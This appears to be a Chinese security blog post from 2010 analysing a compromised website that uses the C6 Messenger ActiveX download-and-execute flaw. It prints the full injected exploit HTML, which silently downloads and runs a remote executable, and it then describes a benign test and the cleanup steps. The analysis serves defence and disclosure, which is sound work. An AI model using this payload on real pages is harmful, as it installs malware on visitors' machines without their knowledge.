发现利用日期:2010-1-16

预计利用率提升几率 : 中▁▂▃▄▅▆▇

被挂马网站: yjsjl.cn
挂马页: hxxp://www.yjsjl.cn/css/test.html
漏洞名:  C6 Messenger ActiveX Remote Download & Execute Exploit
(模块提供点:hxxp://www.yjsjl.cn/css/flash.cab#Version=1,0,0,1)
CLSID: c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61
软件:  C6 Messenger ActiveX (病毒网站返回cab显示名为DownloaderActiveX Control)
版本: 1.0.0.1 (?)
New exploit? No (already published on 2008.06.04 by Nine:Situations:Group::SnoopyAssault)
*(相关信息:http://www.heibai.net/article/info/info.php?infoid=41670)

 

利用代码(请自行转为半角字符)

</html></script></body><BODY><OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="http://www.yjsjl.cn/css/flash.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://www.yjsjl.cn/css/time.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>

一个很粗心的漏洞,由于不是溢出漏洞,也就不会一瞬间干完我内存了,所以做一个漏洞执行测试:

图1   原始页面代码:

 

图2   制作一个简单的提示程序,启动后弹出对话框,显示“ACTIVED”:

 

图3   修改恶意代码,URL指向测试用的文件:

 

图4   打开测试页面,弹出对话框询问是否安装软件,注意如果这儿点了“不安装”那么是不会中毒的。当然如果之前你安装过这个那谁也救不了你了……为了测试继续,点击安装

图5   测试exe被成功下载并执行,弹出对话框,同时监控显示有了GET /test.exe的请求:

图6   打开ACTIVEX列表,可以看到第一个就是它,关闭浏览器,右键删除即可清理掉ACTIVEX(当然ACTIVEX下载回来的其他文件(这儿的“其他文件”也就是病毒了)是不会顺带清除掉的):